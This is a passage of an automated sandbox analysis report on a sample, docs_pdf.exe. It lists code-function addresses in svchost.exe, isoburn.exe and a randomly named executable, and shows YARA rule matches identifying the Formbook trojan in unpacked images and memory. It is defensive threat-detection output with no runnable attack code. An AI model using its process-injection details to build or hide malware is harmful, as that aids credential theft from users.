            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E0532_2_0042E053
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040282A2_2_0040282A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028302_2_00402830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010C02_2_004010C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004108932_2_00410893
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010BE2_2_004010BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E9132_2_0040E913
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029F02_2_004029F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033FF2_2_004033FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404C542_2_00404C54
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004034002_2_00403400
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402CA42_2_00402CA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402CB02_2_00402CB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004106732_2_00410673
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416FDF2_2_00416FDF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416FE32_2_00416FE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038095C32_2_038095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD22_2_03703FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD52_2_03703FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A2DBB84_2_03A2DBB8
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A343044_2_03A34304
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A343084_2_03A34308
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A4B3784_2_03A4B378
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A2D9984_2_03A2D998
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeCode function: 4_2_03A21F794_2_03A21F79
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0491E4F65_2_0491E4F6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049144205_2_04914420
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049224465_2_04922446
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049305915_2_04930591
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048705355_2_04870535
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0488C6E05_2_0488C6E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0486C7C05_2_0486C7C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048947505_2_04894750
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048707705_2_04870770
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049020005_2_04902000
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049241A25_2_049241A2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049301AA5_2_049301AA
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049281CC5_2_049281CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048601005_2_04860100
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0490A1185_2_0490A118
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048F81585_2_048F8158
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048F02C05_2_048F02C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049102745_2_04910274
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049303E65_2_049303E6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0487E3F05_2_0487E3F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492A3525_2_0492A352
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04910CB55_2_04910CB5
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04860CF25_2_04860CF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04870C005_2_04870C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04888DBF5_2_04888DBF
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0486ADE05_2_0486ADE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0487AD005_2_0487AD00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0490CD1F5_2_0490CD1F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492CE935_2_0492CE93
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04882E905_2_04882E90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492EEDB5_2_0492EEDB
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492EE265_2_0492EE26
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04870E595_2_04870E59
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048EEFA05_2_048EEFA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04862FC85_2_04862FC8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0487CFE05_2_0487CFE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04912F305_2_04912F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048B2F285_2_048B2F28
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04890F305_2_04890F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048E4F405_2_048E4F40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048568B85_2_048568B8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0489E8F05_2_0489E8F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048728405_2_04872840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0487A8405_2_0487A840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048729A05_2_048729A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0493A9A65_2_0493A9A6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048869625_2_04886962
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0486EA805_2_0486EA80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04926BD75_2_04926BD7
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492AB405_2_0492AB40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492F43F5_2_0492F43F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048614605_2_04861460
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0490D5B05_2_0490D5B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049395C35_2_049395C3
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049275715_2_04927571
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049216CC5_2_049216CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048B56305_2_048B5630
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492F7B05_2_0492F7B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048770C05_2_048770C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0491F0CC5_2_0491F0CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492F0E05_2_0492F0E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049270E95_2_049270E9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0487B1B05_2_0487B1B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A516C5_2_048A516C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0485F1725_2_0485F172
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0493B16B5_2_0493B16B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048752A05_2_048752A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0488B2C05_2_0488B2C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049112ED5_2_049112ED
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048B739A5_2_048B739A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492132D5_2_0492132D
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0485D34C5_2_0485D34C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492FCF25_2_0492FCF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048E9C325_2_048E9C32
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0488FDC05_2_0488FDC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04873D405_2_04873D40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04921D5A5_2_04921D5A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04927D735_2_04927D73
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04879EB05_2_04879EB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04871F925_2_04871F92
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492FFB15_2_0492FFB1
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04833FD25_2_04833FD2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04833FD55_2_04833FD5
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492FF095_2_0492FF09
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048738E05_2_048738E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048DD8005_2_048DD800
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_049059105_2_04905910
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048799505_2_04879950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0488B9505_2_0488B950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048B5AA05_2_048B5AA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04911AA35_2_04911AA3
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0490DAAC5_2_0490DAAC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0491DAC65_2_0491DAC6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_04927A465_2_04927A46
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492FA495_2_0492FA49
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048E3A6C5_2_048E3A6C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0488FB805_2_0488FB80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048ADBF95_2_048ADBF9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048E5BF05_2_048E5BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0492FB765_2_0492FB76
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_008119E05_2_008119E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0082A5A05_2_0082A5A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0080CBC05_2_0080CBC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0080CDE05_2_0080CDE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0080AE605_2_0080AE60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_008011A15_2_008011A1
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0081352C5_2_0081352C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_008135305_2_00813530
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0468C07D5_2_0468C07D
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0468B0E85_2_0468B0E8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0468A3A95_2_0468A3A9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0468BCE85_2_0468BCE8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0468BBC85_2_0468BBC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: String function: 000F7F41 appears 35 times
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: String function: 00110D27 appears 70 times
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: String function: 00118B40 appears 42 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 048EF290 appears 105 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0485B970 appears 280 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 048B7E54 appears 111 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 048DEA12 appears 86 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 048A5130 appears 58 times
            Source: docs_pdf.exe, 00000000.00000003.2098029942.0000000003D03000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs docs_pdf.exe
            Source: docs_pdf.exe, 00000000.00000003.2098263336.0000000003EAD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs docs_pdf.exe
            Source: docs_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
